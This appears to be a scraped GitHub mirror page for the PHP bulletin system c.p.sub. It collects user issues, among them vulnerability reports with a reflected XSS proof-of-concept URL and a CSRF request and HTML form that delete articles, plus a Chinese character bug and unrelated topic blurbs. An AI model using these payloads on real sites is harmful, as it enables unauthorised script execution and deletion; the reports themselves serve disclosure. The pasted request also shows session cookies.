cooltey / c.p.sub Goto Github PK
View Code? Open in Web Editor NEWPHP Bulletin System with CSV
PHP Bulletin System with CSV
parameter value without rigorous filtration
File:Index.php
Poc Payload:
http://site/index.php?keyword=%22%3E%3Csvg/onload=alert(domain)%3E%22
Vesrion:5.2
keyword does not check the output and input points, resulting in code triggering
Resolving: Filtering encoding or escaping
Hi,
Thanks for u create a super useful system.
Here is my question show below
Everything work fine in English...
But when I use Chinese As post title, the system will not record anything...
So I can just use English only
簡單的說
我只要在標題或是作者欄位輸入中文
所有的中文在布告欄中都會消失
但是用英文的標題就不會
目前使用的是免費空間
謝謝拉,這系統太棒了
想請您幫忙一下
不知道哪裡有問題了
Hey , C.P.Sub
In your Background admin delete Article section, did not produce relevant token verification source caused CSRF, and the "get" parameter value is very dangerous.
List:
http://website/manage.php?p=article_list
Poc Payload:
**
GET /manage.php?p=article_del&id=ID HTTP/1.1
Host: your_website
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://127.0.0.1/456/manage.php?p=article_list
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=test%7C1537587372%7CgZf4275f8FC9rh5rffBvPrfPZwQBwSdtTLoKtW1JdQ6%7C4350d349b75ea62d1bbd963b4ee5460a95206b92a5df2dd7899ff7ccdc51bea3; wp-settings-1=mfold%3Do; wp-settings-time-1=1537414573; cerber_groove=49d7bce85e1b8082ab6d6cdf0854abc8; cerber_groove_x_Ad7onvqFrh3GYs8jQ1I24UyDpVRC=G0c9tWNuhQ4Z8azbyspmHrx7fYE5XM; _awtvW=Zqmk3E; gXSlbZOPaVqTWrR=%5DjCLPER7IhSHZkD; tUAnShmrCET=gLvmBVQPSwn; AJeZVoHYa=Gd3nvWzpe; PHPSESSID=hbdcrh6cj6jgl9v4jo5gedbcp6
Connection: close
**
Poc Payload:
<html>
<head>
<title>CSRF</title>
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://website/manage.php">
<input type="hidden" name="p" value="article_del" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Hello" />
</form>
</body>
</html>
You can see that after obtaining the parameters of the direct splicing instructions, also echo the relevant commands, no relevant rigorous filter inspection caused the vulnerability:
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Settings has a deprecated constructor in \CPSub\class\settings.php on line 8
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Lib has a deprecated constructor in \WEB\CPSub\class\lib.php on line 8
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Article has a deprecated constructor in \WEB\CPSub\class\article.php on line 8
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Pager has a deprecated constructor in \WEB\CPSub\class\page.php on line 10
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Template has a deprecated constructor in \WEB\CPSub\class\template.php on line 8
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.